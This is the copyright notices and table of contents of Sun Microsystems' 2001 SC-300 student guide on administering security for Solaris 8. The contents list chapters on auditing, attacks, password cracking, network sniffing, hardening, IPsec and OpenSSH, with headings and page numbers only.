SC-300 Administering Security on the Solaris 8 Operating Environment

Date posted: 28-Dec-2015
Sun Microsystems, Inc.
UBRM05-104
500 Eldorado Blvd.
Broomfield, CO 80021
U.S.A.

Revision C, August 2001

Administering Security on the Solaris™ 8 Operating Environment
SC-300
Student Guide


Copyright 2001 Sun Microsystems, Inc., 901 San Antonio Road, Palo Alto, California 94303, U.S.A. All rights reserved.

This product or document is protected by copyright and distributed under licenses restricting its use, copying, distribution, and decompilation. No part of this product or document may be reproduced in any form by any means without prior written authorization of Sun and its licensors, if any.

Third-party software, including font technology, is copyrighted and licensed from Sun suppliers.

Parts of the product may be derived from Berkeley BSD systems, licensed from the University of California. UNIX is a registered trademark in the U.S. and other countries, exclusively licensed through X/Open Company, Ltd.

Sun, Sun Microsystems, the Sun Logo, SunDocs, EJB, Enterprise JavaBeans, Forte Fusion, Java, Java 2 Platform, Enterprise Edition, Java API for XML Parsing, Java Authentication and Authorization Service, JavaBeans, Java Community Process, JavaMail, Java Message Service, JavaOne, JavaScript, Java Secure Socket Extension, JavaServer, JavaServer Pages, Java Virtual Machine, Java Web Server, J2EE, JDBC, JDK, JSP, JVM, Solaris, and SunNet Manager are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries.

All SPARC trademarks are used under license and are trademarks or registered trademarks of SPARC International, Inc. in the U.S. and other countries. Products bearing SPARC trademarks are based upon an architecture developed by Sun Microsystems, Inc.

Netscape is a trademark or registered trademark of Netscape Communications Corporation in the United States and other countries.

Netscape Navigator is a trademark or registered trademark of Netscape Communications Corporation in the United States and other countries.

U.S. Government approval required when exporting the product.

RESTRICTED RIGHTS: Use, duplication, or disclosure by the U.S. Government is subject to restrictions of FAR 52.227-14(g) (2)(6/87) and FAR 52.227-19(6/87), or DFAR 252.227-7015 (b)(6/95) and DFAR 227.7202-3(a).

DOCUMENTATION IS PROVIDED “AS IS” AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS, AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE DISCLAIMED, EXCEPT TO THE EXTENT THAT SUCH DISCLAIMERS ARE HELD TO BE LEGALLY INVALID.


Copyright 2001 Sun Microsystems Inc., 901 San Antonio Road, Palo Alto, California 94303, United States. All rights reserved.

This product or document is protected by copyright and distributed under licenses restricting its use, copying, distribution, and decompilation. No part of this product or document may be reproduced in any form, by any means, without the prior written authorization of Sun and its licensors, if any.

Third-party software, including font technology, is protected by copyright and licensed from Sun suppliers.

Parts of this product may be derived from the Berkeley 4.3 BSD system, licensed from the University of California. UNIX is a registered trademark in the United States and other countries, exclusively licensed through X/Open Company Ltd.

Sun, Sun Microsystems, the Sun Logo, SunDocs, EJB, Enterprise JavaBeans, Forte Fusion, Java, Java 2 Platform, Enterprise Edition, Java API for XML Parsing, Java Authentication and Authorization Service, JavaBeans, Java Community Process, JavaMail, Java Message Service, JavaOne, JavaScript, Java Secure Socket Extension, JavaServer, JavaServer Pages, Java Virtual Machine, Java Web Server, J2EE, JDBC, JDK, JSP, JVM, Solaris, and SunNet Manager are trademarks or registered trademarks of Sun Microsystems, Inc. in the United States and other countries.

All SPARC trademarks are used under license and are trademarks or registered trademarks of SPARC International, Inc. in the United States and other countries.

Netscape is a trademark of Netscape Communications Corporation in the United States and other countries.

Netscape Navigator is a trademark of Netscape Communications Corporation in the United States and other countries.

Products bearing SPARC trademarks are based on an architecture developed by Sun Microsystems, Inc.

DOCUMENTATION IS PROVIDED “AS IS” AND ALL OTHER EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS, AND WARRANTIES ARE EXPRESSLY EXCLUDED, TO THE EXTENT PERMITTED BY APPLICABLE LAW, INCLUDING IN PARTICULAR ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT.

Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Table of Contents

About This Course .................................................................Preface-iCourse Goals............................................................................ Preface-iCourse Map..............................................................................Preface-iiModule-by-Module Overview .............................................Preface-iiiCourse Objectives...................................................................Preface-viTopics Not Covered..............................................................Preface-viiHow Prepared Are You?.................................................... Preface-viiiIntroductions .......................................................................... Preface-ixHow to Use Course Materials ............................................... Preface-xCourse Icons and Typographical Conventions ................. Preface-xi

Icons ................................................................................ Preface-xiTypographical Conventions .......................................Preface-xii

Security Overview ............................................................................1-1Objectives ........................................................................................... 1-1Relevance............................................................................................. 1-2Additional Resources ........................................................................ 1-3

Tool Downloads ........................................................................ 1-3Understanding Security ................................................................... 1-4

Security and UNIX®

................................................................. 1-5Examples of Break-Ins....................................................................... 1-8

Chronology of a Host Compromise ....................................... 1-8Western Union........................................................................... 1-9Nuclear Power Station............................................................ 1-10Travelocity ............................................................................... 1-10FTP Server ................................................................................ 1-10Yahoo! Web Server.................................................................. 1-11

Security Terminology ..................................................................... 1-12The Orange Book............................................................................. 1-14

Common Terms....................................................................... 1-16Types of Security Attacks .............................................................. 1-21

Fraud and Theft....................................................................... 1-21Terrorism and Sabotage ......................................................... 1-22Privacy Violation..................................................................... 1-22

Page 6: SC-300 Administering Security on the Solaris 8 Operating Environment

vi Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Publicity Attacks ..................................................................... 1-23Denial of Service...................................................................... 1-24Natural Causes and Environmental Influences.................. 1-24

Frequency of Security Attacks ....................................................... 1-25Security Attacks Are Rare – Or Are They?.......................... 1-26

Understanding Your Attackers..................................................... 1-28Motivations of an Attacker .................................................... 1-30Other Types of Attackers ....................................................... 1-31Hackers ..................................................................................... 1-32Script Kiddies .......................................................................... 1-33Terrorists .................................................................................. 1-33Criminals .................................................................................. 1-33Employees ................................................................................ 1-34Top Enterprise-Wide Attacks................................................ 1-34

Running an Intrusion Detection System...................................... 1-36Burglar Alarms and Honey Pots........................................... 1-37Running Dummy Attacks...................................................... 1-38Vulnerability Scanners ........................................................... 1-38

Security Policy ................................................................................. 1-39Purpose and Use of a Security Policy .................................. 1-41Creating a Security Policy...................................................... 1-42

Using Third-Party Security Tools ................................................. 1-43Installation of Third-Party Tools .......................................... 1-44Security Issues With Third-Party Tools ............................... 1-46

Site Policy for Security Tools......................................................... 1-47Exercise: Considering Security Issues........................................... 1-49

Task – Example Security Attacks.......................................... 1-49Task – Security Policy............................................................. 1-49Task – System Configuration ................................................ 1-50

Exercise Summary............................................................................ 1-54Exercise Solutions ............................................................................ 1-55

Example Security Attacks ...................................................... 1-55Security Policy ......................................................................... 1-55System Configuration............................................................. 1-55

Using Solaris™ OE Log Files ......................................................... 2-1Objectives ........................................................................................... 2-1Relevance............................................................................................. 2-2Additional Resources ........................................................................ 2-3

Tool Downloads ........................................................................ 2-3Solaris OE Logging Files ................................................................... 2-4

Using /var/adm/lastlog Files.............................................. 2-5Using /var/adm/loginlog Files ........................................... 2-6Using utmpx and wtmpx Log Files .......................................... 2-6Using the sulog File ................................................................. 2-7Using /var/adm/messages Files ........................................... 2-7

Page 7: SC-300 Administering Security on the Solaris 8 Operating Environment

viiCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

The System Logging Facility ........................................................... 2-8Configuring the Syslog Utility ................................................ 2-9Why Use Centralized Logging? ............................................ 2-13The logger Utility .................................................................. 2-15Using the swatch Tool ........................................................... 2-16

Solaris OE Monitoring Tools .......................................................... 2-23Process Monitoring Using the top Tool ...................................... 2-25The Solaris OE Accounting Package ............................................ 2-27

Why Use the Accounting Package?...................................... 2-28Process Accounting................................................................. 2-29Working With the Accounting Package .............................. 2-30Setting Up Accounting ........................................................... 2-35

Exercise: Using Logging as a Security Tool ................................. 2-38Preparation............................................................................... 2-38Tasks ......................................................................................... 2-38Task – Sample sulog Commentary File .............................. 2-38Task – Studying Processes .................................................... 2-39Task – Enabling the Syslog Facility to Report su

Command Activity .............................................................. 2-40Task – Enabling the Syslog Facility to Report Failed

Login Activity....................................................................... 2-40Task – Enabling ftp to Report Logins ................................. 2-40Task – Using the swatch Tool............................................... 2-41Task – Starting Process Accounting ..................................... 2-43

Exercise Summary............................................................................ 2-45Exercise Solutions ............................................................................ 2-46

Sample sulog Commentary File .......................................... 2-46Studying Processes ................................................................. 2-47Enabling the Syslog Facility to Report su Command

Activity .................................................................................. 2-48Enabling the Syslog Facility to Report Failed Login

Activity .................................................................................. 2-48Enabling ftp to Report Logins ............................................. 2-49Using the swatch Tool ........................................................... 2-49Starting Process Accounting.................................................. 2-49

The Solaris OE Basic Security Module...........................................3-1Objectives ........................................................................................... 3-1Relevance............................................................................................. 3-2Additional Resources ........................................................................ 3-3Solaris OE Basic Security Module Auditing ................................. 3-4

Identifying Major BSM Components ..................................... 3-6Enabling BSM .......................................................................... 3-11Disabling BSM ......................................................................... 3-13

Page 8: SC-300 Administering Security on the Solaris 8 Operating Environment

viii Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Creating an Audit Trail Using BSM ............................................. 3-14Setting Audit Flags ................................................................. 3-14Generating an Audit Trail...................................................... 3-22

Interpreting and Filtering Audit Data ......................................... 3-26Filtering Audit Data Using the auditreduce

Command.............................................................................. 3-26Formatting Audit Data Using the praudit

Command.............................................................................. 3-28Controlling the auditd Daemon Using the audit

Command.............................................................................. 3-29Implementing BSM Device Management.................................... 3-30

Configuring BSM Device Management ............................... 3-31Interpreting the /etc/security/device_maps File ........ 3-32Interpreting the /etc/security/device_allocate

File .......................................................................................... 3-34The Device-Clean Scripts ....................................................... 3-36Authorizing Users to Access Devices .................................. 3-37Device Allocation and De-Allocation .................................. 3-39Managing Devices Using BSM.............................................. 3-40

Exercise: Using the Basic Security Module .................................. 3-42Preparation............................................................................... 3-42Tasks ......................................................................................... 3-42Task – Installing and Configuring BSM............................... 3-42Task – Monitoring Audit Data .............................................. 3-43Task – Securing a Peripheral Device .................................... 3-44Task – Disabling BSM Auditing............................................ 3-46

Exercise Summary............................................................................ 3-47Exercise Solutions ............................................................................ 3-48

Installing and Configuring BSM........................................... 3-48Monitoring Audit Data .......................................................... 3-48Securing a Peripheral Device ................................................ 3-48Disabling BSM Auditing ........................................................ 3-48

Security Attacks............................................................................... 4-1Objectives ........................................................................................... 4-1Relevance............................................................................................. 4-2Additional Resources ........................................................................ 4-3Recognizing Trojan Horses.............................................................. 4-4

Example Trojan Horses ............................................................ 4-5Identifying Back Doors................................................................... 4-12

Recognizing Common UNIX Back Doors ........................... 4-13Using Devices to Create a Back Door................................... 4-15

Detecting and Preventing Trojan Horse and Back DoorAttacks .............................................................................................. 4-18

The Solaris OE Fingerprint Database................................... 4-18TripWire ................................................................................... 4-19

Page 9: SC-300 Administering Security on the Solaris 8 Operating Environment

ixCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Checklists, File Digests, and Checksums............................. 4-19The BSM Audit Trail............................................................... 4-19Using the find Command..................................................... 4-20Preventing Trojan Horse and Back Door Attacks .............. 4-22

Rootkits – Understanding How Attackers Use Them ............... 4-24Installing Back Doors and Trojan Horses ............................ 4-25Detecting Rootkit Use............................................................. 4-26Kernel Rootkits ........................................................................ 4-28

Identifying Denial of Service Attacks .......................................... 4-30Malicious DoS Attacks ........................................................... 4-31Preventing DoS Attacks ......................................................... 4-33Recognizing Causes of Accidental DoS ............................... 4-34

Exercise: Detecting Trojan Horses and Back Doors .................... 4-35Task – Detecting Trojan Horses and Back Doors ............... 4-35

Exercise Summary............................................................................ 4-36Exercise Solutions ............................................................................ 4-37

Detecting Trojan Horses and Back Doors............................ 4-37

Administering User Accounts Securely .........................................5-1Objectives ........................................................................................... 5-1Relevance............................................................................................. 5-2Additional Resources ........................................................................ 5-3Administering Regular Users.......................................................... 5-4

Determining User and Group IDs .......................................... 5-4Implications of Duplicate User IDs ........................................ 5-5Selecting and Creating Groups and Group IDs (GIDs)....... 5-7Customizing Default Profiles .................................................. 5-8Setting Accounts to Expire..................................................... 5-11

Administering Superuser Accounts ............................................. 5-13Restricting Root Logins .......................................................... 5-14

Securing Guest Accounts ............................................................... 5-15Protecting Dormant Accounts....................................................... 5-17

Deleting Dormant Accounts.................................................. 5-19Checking User Security ................................................................... 5-21

Configuring the /etc/default/su File.............................. 5-21Classifying Non-Login Accounts.................................................. 5-22

Restricting Functionality Using a Non-Login Shell ........... 5-24Limiting User Options With Restricted Shells............................ 5-27

Assessing the Limitations Enforced by RestrictedShells ...................................................................................... 5-28

Configuring a Restricted Shell .............................................. 5-29

Page 10: SC-300 Administering Security on the Solaris 8 Operating Environment

x Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Exercise: Securing Guest and Restricted Accounts ..................... 5-36Preparation............................................................................... 5-36Tasks ......................................................................................... 5-36Task – Creating a Guest Account With Automatic

Expiration.............................................................................. 5-36Task – Configuring a Restricted User Account .................. 5-37

Exercise Summary............................................................................ 5-38Exercise Solutions ............................................................................ 5-39

Creating a Guest Account With AutomaticExpiration.............................................................................. 5-39

Configuring a Restricted User Account............................... 5-39

Password Security........................................................................... 6-1Objectives ........................................................................................... 6-1Relevance............................................................................................. 6-2Additional Resources ........................................................................ 6-3Passwords ........................................................................................... 6-4

Revisiting the Password and Shadow Files .......................... 6-4The /etc/passwd File .............................................................. 6-5The /etc/shadow File .............................................................. 6-7Setting a Password Policy........................................................ 6-9Choosing Good Passwords.................................................... 6-11Revisiting the passwd Command ......................................... 6-15Configuring Password Aging ............................................... 6-16Configuring Default Password Aging ................................. 6-18Checking for Accounts With No Password ........................ 6-19Using Password Generators .................................................. 6-21One-Time Passwords.............................................................. 6-23

Cracking Password Programs....................................................... 6-25Cracking Passwords Using the crack Tool ................................. 6-26

Using the crack Tool to Find Weak Passwords................ 6-27Installing and Running the crack Tool.............................. 6-28

Tools for Setting Good Passwords ............................................... 6-29Exercise: Securing Passwords ........................................................ 6-30

Preparation............................................................................... 6-30Tasks ......................................................................................... 6-30Task – Installing and Configuring the crack Tool ............ 6-30Task – Running the crack Tool Against the System

Passwords ............................................................................. 6-31Task – Using the crack Tool to Check Favorite

Passwords ............................................................................. 6-32Exercise Summary............................................................................ 6-33

Page 11: SC-300 Administering Security on the Solaris 8 Operating Environment

xiCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Exercise Solutions ............................................................................ 6-34Installing and Configuring the crack Tool......................... 6-34Running the crack Tool Against the System

Passwords ............................................................................. 6-34Using the crack Tool to Check Favorite Passwords ......... 6-35

Securing Root Access .....................................................................7-1Objectives ........................................................................................... 7-1Relevance............................................................................................. 7-2Additional Resources ........................................................................ 7-3

Tool Downloads ........................................................................ 7-3Controlling Root Access................................................................... 7-4Solaris OE Role Based Access Control (RBAC) ............................ 7-5

Understanding RBAC Concepts ............................................. 7-6Configuring RBAC Profiles ..................................................... 7-8Adding RBAC Profiles ........................................................... 7-10Using RBAC Roles and Profiles ............................................ 7-11Assigning Roles and Profiles................................................. 7-15Assuming a Role ..................................................................... 7-17Evaluating RBAC .................................................................... 7-18

The sudo Utility............................................................................... 7-20Using the sudo Utility ............................................................ 7-21Introducing sudo Tickets ....................................................... 7-23Configuring the sudo Utility ................................................. 7-24The sudoers Format............................................................... 7-25Using Aliases ........................................................................... 7-27Using Defaults ......................................................................... 7-29Logging sudo Activity............................................................ 7-31Security Implications of Using the sudo Utility ................. 7-33Evaluating the sudo Utility ................................................... 7-35

Exercise: Controlling Root Access ................................................. 7-36Preparation............................................................................... 7-36Tasks ......................................................................................... 7-36Task – Installing and Configuring the sudo Utility ........... 7-36Task – Configuring RBAC ..................................................... 7-37

Exercise Summary............................................................................ 7-38Exercise Solutions ............................................................................ 7-39

Installing and Configuring the sudo Utility ....................... 7-39Configuring RBAC.................................................................. 7-40

Page 12: SC-300 Administering Security on the Solaris 8 Operating Environment

xii Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

File System Attacks ......... 8-1
    Objectives ......... 8-1
    Relevance ......... 8-2
    Additional Resources ......... 8-3
    Guidelines for Setting Up the root Partition ......... 8-4
        Preventing Users From Filling the /tmp File ......... 8-5
        Using Temporary File Systems ......... 8-6
        Preventing DoS Due to Limited Swap Space ......... 8-8
    Setting File System Permissions for Security ......... 8-10
        File Permissions ......... 8-11
        Directory Permissions ......... 8-12
        Permission Categories ......... 8-13
        Review File Permissions ......... 8-15
        Implications of Lax Permissions ......... 8-17
        Preventing Lax Permissions Using the umask Setting ......... 8-18
        Checking File Permissions ......... 8-19
    Set-User-ID and Set-Group-ID Files ......... 8-20
        Identifying and Changing SUID and SGID Bits ......... 8-22
    Setting Sticky Bits and SGID on Directories ......... 8-24
        Using Sticky Directories ......... 8-25
        Setting SGID Directories ......... 8-27
    Securing Files Using Access Control Lists ......... 8-29
        Using the getfacl and setfacl Commands ......... 8-31
        Deleting ACL Entries ......... 8-37
    Encrypting Data ......... 8-38
        The crypt Command ......... 8-39
    Securing Device Files ......... 8-41
        Unauthorized Device Files ......... 8-42
    Guidelines for Protecting Systems Using Backups ......... 8-43
        Restoring Data ......... 8-47
    Exercise: Securing File Systems ......... 8-48
        Preparation ......... 8-48
        Tasks ......... 8-48
        Task – Creating ACLs ......... 8-48
        Task – Creating a Group-Shared Directory ......... 8-49
        Task – Creating File System Hardening Checklist ......... 8-50
    Exercise Summary ......... 8-51
    Exercise Solutions ......... 8-52
        Creating ACLs ......... 8-52
        Creating a Group-Shared Directory ......... 8-54
        Creating a File System Hardening Checklist ......... 8-57

Auditing File Systems ......... 9-1
    Objectives ......... 9-1
    Relevance ......... 9-2
    Additional Resources ......... 9-3


    What Is Auditing? ......... 9-4
        Auditing Techniques ......... 9-6
        Using Audits to Detect Successful Security Attacks ......... 9-8
        File Digests and Checksums ......... 9-9
        Checksum Algorithms ......... 9-10
        File Digest Algorithms ......... 9-11
        The Solaris OE Fingerprint Database ......... 9-13
    Using TripWire to Audit File Systems ......... 9-15
        Obtaining the TripWire Tool ......... 9-16
        Editing the TripWire Configuration File ......... 9-17
        Configuration Templates ......... 9-20
        Generating a TripWire Database ......... 9-21
        Checking a TripWire Database ......... 9-23
        Identifying Inconsistencies ......... 9-24
        Updating the Database ......... 9-25
        Double-Checking Integrity ......... 9-25
    Securing the TripWire Database ......... 9-27
    Exercise: Using the TripWire Tool ......... 9-29
        Preparation ......... 9-29
        Task – Installing TripWire ......... 9-29
        Task – Creating a TripWire Configuration ......... 9-30
        Task – Running System Integrity Checks ......... 9-31
    Exercise Summary ......... 9-33
    Exercise Solutions ......... 9-34
        Installing TripWire ......... 9-34
        Creating a TripWire Configuration ......... 9-36
        Running System Integrity Checks ......... 9-37

Attacking Network Data ......... 10-1
    Objectives ......... 10-1
    Relevance ......... 10-2
    Additional Resources ......... 10-3
    Network Sniffing ......... 10-4
        Implications of Sniffing ......... 10-6
        How Sniffers Work ......... 10-7
        Detecting Sniffers ......... 10-8
        Defending Against Network Sniffers ......... 10-10
    Network Sniffing Tools ......... 10-11
        The snoop Utility ......... 10-12
        The snoop Options ......... 10-14
        The snoop Packet Filters ......... 10-17
        The dsniff Utility ......... 10-20
        Running the dsniff Utility ......... 10-21
    Network Service Attacks ......... 10-25
        Packet Replay Attacks ......... 10-26
        Vulnerabilities of the sendmail Program ......... 10-28


        Buffer Overflow Attacks ......... 10-30
        Web (HTTP) Servers ......... 10-32
        Network Denial of Service Attacks ......... 10-33
        Types of Network Denial of Service Attacks ......... 10-35
        TCP SYN Flood Attack ......... 10-35
        Ping of Death Attack ......... 10-38
        Smurf Attack ......... 10-39
        Smurf Countermeasures ......... 10-41
        Recognizing Network Attacks ......... 10-42
        Port Scanning Using the nmap Utility ......... 10-43
        Host Information From the nmap Utility ......... 10-45
    Exercise: Using Network Sniffing ......... 10-47
        Preparation ......... 10-47
        Tasks ......... 10-47
        Task – Using the snoop Utility to Sniff Network Traffic ......... 10-47
        Task – Installing the dsniff Utility ......... 10-48
        Task – Using the dsniff Utility ......... 10-48
    Exercise Summary ......... 10-49
    Exercise Solutions ......... 10-50
        Using the snoop Utility to Sniff Network Traffic ......... 10-50
        Installing the dsniff Utility ......... 10-50
        Using the dsniff Utility ......... 10-50

Securing Network Data ......... 11-1
    Objectives ......... 11-1
    Relevance ......... 11-2
    Additional Resources ......... 11-3
    Implementing Secure Communication Using SSL ......... 11-4
        The Open SSL Project ......... 11-5
    Defining the SSL ......... 11-6
        Properties of SSL ......... 11-7
        Simplifying SSL Using the stunnel Program ......... 11-8
        How Secure Is the SSL? ......... 11-10
    Understanding the IP Security Architecture (IPsec) ......... 11-12
        Configuring IPsec Security Associations ......... 11-13
        Adding IPsec Keys ......... 11-14
        Configuring IPsec Policies ......... 11-17
        Using the ipsecconf Utility to Configure IPsec ......... 11-18
        Syntax for the IPsec Configuration File ......... 11-20
        Rules for Parsing the Configuration File ......... 11-23
        Example IPsec Configurations ......... 11-24
        Security Considerations With IPsec ......... 11-26


    Using the SunScreen™ SKIP Utility ......... 11-27
        Configuring the SKIP Utility ......... 11-28
        Working With SKIP ......... 11-30
        Using Clear Text ......... 11-31
    Exercise: Configuring and Using IPsec ......... 11-32
        Preparation ......... 11-32
        Tasks ......... 11-32
        Task – Configuring IPsec ......... 11-33
        Task – Configuring IPsec Encryption ......... 11-33
        Task – Configuring IPsec Authentication ......... 11-35
        Task – Authenticating All Hosts With IPsec ......... 11-36
        Task – Using IPsec AH and ESP With All Hosts ......... 11-36
        Task – Removing IPsec ......... 11-37
    Exercise Summary ......... 11-38
    Exercise Solutions ......... 11-39
        Configuring IPsec ......... 11-39
        Configuring IPsec Encryption ......... 11-40
        Configuring IPsec Authentication ......... 11-40
        Authenticating All Hosts With IPsec ......... 11-40
        Using IPsec AH and ESP With All Hosts ......... 11-41
        Removing IPsec ......... 11-41

Analyzing Network Services ......... 12-1
    Objectives ......... 12-1
    Relevance ......... 12-2
    Additional Resources ......... 12-3
        Tool Downloads ......... 12-3
    Applying SAINT to Improve Network Security ......... 12-4
        Assessing the Capabilities of SAINT ......... 12-6
        Comparing SAINT and SATAN ......... 12-7
    Installing and Using SAINT ......... 12-8
        Understanding How SAINT Works ......... 12-10
        Using the SAINT Graphical User Interface ......... 12-12
        Defining SAINT Data Management ......... 12-14
        Setting SAINT Target Selection ......... 12-15
        Defining the Level of Attack ......... 12-16
        Allowing for Firewalls ......... 12-17
        Running a SAINT Scan ......... 12-18
    Configuring SAINT ......... 12-21
        Setting the Attack Level ......... 12-22
        Configuring Probes by Attack Level ......... 12-23
        Setting the Level of Password Guessing ......... 12-25
        Setting Time-Outs ......... 12-27
        Determining Values for Proximity Variables ......... 12-28


    Interpreting SAINT Reports ......... 12-31
        Reporting Vulnerabilities by Type ......... 12-31
        Reporting Potential Problems ......... 12-32
    Detecting Network Analyzer Attacks ......... 12-33
        Detecting Attacks Using Courtney ......... 12-34
        Obtaining and Installing Courtney ......... 12-35
        Using Courtney ......... 12-36
    Exercise: Using SAINT and Courtney ......... 12-37
        Preparation ......... 12-37
        Task – Installing SAINT ......... 12-37
        Task – Running a SAINT Attack ......... 12-38
        Task – Running SAINT From the Command Line ......... 12-38
        Task – Installing Courtney ......... 12-38
        Task – Using Courtney to Detect Attacks ......... 12-39
    Exercise Summary ......... 12-40
    Exercise Solutions ......... 12-41
        Installing SAINT ......... 12-41
        Running a SAINT Attack ......... 12-41
        Running SAINT From the Command Line ......... 12-42
        Installing Courtney ......... 12-42
        Using Courtney to Detect Attacks ......... 12-42

Securing Network Services ......... 13-1
    Objectives ......... 13-1
    Relevance ......... 13-2
    Additional Resources ......... 13-3
    Restricting Network Services ......... 13-4
        FTP Users ......... 13-7
    Defending Network Services ......... 13-8
        Non-Standard Port Numbers ......... 13-9
        Dummy Services ......... 13-9
    Berkeley r Commands ......... 13-10
        Trusted Hosts ......... 13-12
        Determining Trusted Access ......... 13-15
        Trusted Hosts – Good or Bad? ......... 13-17
    Securing Services With the chroot Command ......... 13-19
        When to Use the chroot Command ......... 13-20
        How to Use the chroot Command ......... 13-20
        Anonymous FTP ......... 13-22
    Pluggable Authentication Module (PAM) ......... 13-25
        PAM Runtime Modules ......... 13-26
        PAM Configuration File ......... 13-29
        PAM Control Flags ......... 13-31
        Deploying PAM ......... 13-35
        Adding a PAM Module ......... 13-36
        Disabling Remote Access Using PAM ......... 13-38


        Initiating PAM Error Reporting ......... 13-40
    Sun Enterprise Authentication Mechanism (SEAM) ......... 13-42
        Enhancing Security Using Kerberos v5 ......... 13-42
        Logging in Using Kerberos v5 ......... 13-44
        Kerberos Features ......... 13-45
    Understanding Kerberos Limitations ......... 13-47
        Configuring SEAM Clients ......... 13-49
    Exercise: Securing Network Services ......... 13-51
        Preparation ......... 13-51
        Tasks ......... 13-51
        Task – Disabling Network Services ......... 13-51
        Task – Understanding Trusted Hosts ......... 13-52
        Task – Configuring Trusted Hosts ......... 13-53
        Task – Disabling Trusted Hosts ......... 13-53
        Task – Configuring Anonymous FTP ......... 13-53
    Exercise Summary ......... 13-54
    Exercise Solutions ......... 13-55
        Disabling Network Services ......... 13-55
        Understanding Trusted Hosts ......... 13-55
        Configuring Trusted Hosts ......... 13-56
        Disabling Trusted Hosts ......... 13-57
        Configuring Anonymous FTP ......... 13-57

Hardening the System ......... 14-1
    Objectives ......... 14-1
    Relevance ......... 14-2
    Additional Resources ......... 14-3
    System Hardening ......... 14-4
        Commonly Available Hardening Tools ......... 14-5
        COPS ......... 14-6
        Tiger ......... 14-8
        Solaris Security Toolkit ......... 14-9
    Using Titan ......... 14-11
        Titan Design Goals ......... 14-12
        Using Titan Modules ......... 14-13
        Configuring Titan ......... 14-18
        Running Titan ......... 14-19
        Creating a Titan Configuration ......... 14-20
        Running a Single Module ......... 14-21
        Writing Your Own Titan Modules ......... 14-22
        Module Structure ......... 14-23
    Enhancing System Security Using ASET ......... 14-26
        Using ASET Security Levels ......... 14-27
        Running ASET Manually ......... 14-29
        Restoring the System ......... 14-32
        Monitoring Task Status ......... 14-32


        Running ASET Periodically ......... 14-33
        Interpreting ASET Reports ......... 14-35
        Confirming Security Improvements Using the aset Command ......... 14-36
        Interpreting and Configuring the tune.* Files ......... 14-36
    Exercise: Hardening the System ......... 14-39
        Preparation ......... 14-39
        Tasks ......... 14-39
        Task – Installing and Configuring Titan ......... 14-39
        Task – Using Titan to Report on Security Problems ......... 14-40
        Task – Creating and Running a Titan Configuration ......... 14-41
        Task – Running ASET Interactively ......... 14-41
        Task – Configuring ASET Periodically ......... 14-42
    Exercise Summary ......... 14-43
    Exercise Solutions ......... 14-44
        Installing and Configuring Titan ......... 14-44
        Using Titan to Report on Security Problems ......... 14-44
        Creating and Running a Titan Configuration ......... 14-44
        Running ASET Interactively ......... 14-46
        Configuring ASET Periodically ......... 14-48

Authenticating Network Services ......... 15-1
    Objectives ......... 15-1
    Relevance ......... 15-2
    Additional Resources ......... 15-3
    Understanding Network Authentication ......... 15-4
    Using TCP Wrappers ......... 15-6
        Obtaining and Installing TCP Wrappers ......... 15-8
    Configuring TCP Wrappers ......... 15-9
        Installing Hidden TCP Wrappers ......... 15-10
        Installing Visible TCP Wrappers ......... 15-11
        Checking TCP Wrappers’ Configuration ......... 15-12
    Configuring Client Access Logging ......... 15-14
    Configuring Host Access Control ......... 15-16
        Access File Format ......... 15-17
    Using Banners With TCP Wrappers ......... 15-19
        Building Banner Files ......... 15-21
        Customizing a Banner Message ......... 15-22
    Using Banners Without TCP Wrappers ......... 15-24
    Using TCP Wrappers to Spawn Commands ......... 15-25
    Checking Host Access Configuration ......... 15-27
    Exercise: Authenticating Network Services ......... 15-29
        Preparation ......... 15-29
        Tasks ......... 15-29
        Task – Installing TCP Wrappers ......... 15-29
        Task – Enabling Logging for telnet Connections ......... 15-30


        Task – Denying Access to Specific Hosts ......... 15-30
        Task – Configuring TCP Wrappers to Warn of Denied telnet Access ......... 15-30
        Task – Configuring TCP Wrappers to Deny Access to All Hosts Except Those Specified ......... 15-30
        Task – Removing Host Access Control ......... 15-31
    Exercise Summary ......... 15-32
    Exercise Solutions ......... 15-33
        Installing TCP Wrappers ......... 15-33
        Enabling Logging for telnet Connections ......... 15-33
        Denying Access to Specific Hosts ......... 15-34
        Configuring TCP Wrappers to Warn of Denied telnet Access ......... 15-35
        Configuring TCP Wrappers to Deny Access to All Hosts Except Those Specified ......... 15-36
        Removing Host Access Control ......... 15-36

Securing Remote Access ......... 16-1
    Objectives ......... 16-1
    Relevance ......... 16-2
    Additional Resources ......... 16-3
    Identifying the Benefits of the Secure Shell ......... 16-4
        OpenSSH Tools ......... 16-6
        Using Encryption and Compression ......... 16-8
        Security Benefits of Server Authentication ......... 16-9
        Client Authentication ......... 16-11
        Forwarding TCP/IP Ports Using OpenSSH ......... 16-12
        Copying Files and Executing Commands ......... 16-14
        Benefits of the Password Agent ......... 16-15
    Configuring the OpenSSH Server ......... 16-16
        Creating the Host Key ......... 16-19
        Starting the Secure Shell Daemon ......... 16-21
        Installing the Secure FTP Server ......... 16-22
    Using OpenSSH Clients ......... 16-23
        Determining Known Hosts ......... 16-25
        Generating Client Keys ......... 16-27
        Granting Access to Other Users ......... 16-29
        Using OpenSSH With RSA Authentication ......... 16-30
        Using the ssh-agent Program ......... 16-31
        Using the Secure FTP Client ......... 16-33
        Configuring the Client ......... 16-35
    Exercise: Using Secure Shell ......... 16-38
        Preparation ......... 16-38
        Task – Using Secure Shell ......... 16-38
        Task – Installing OpenSSH ......... 16-38
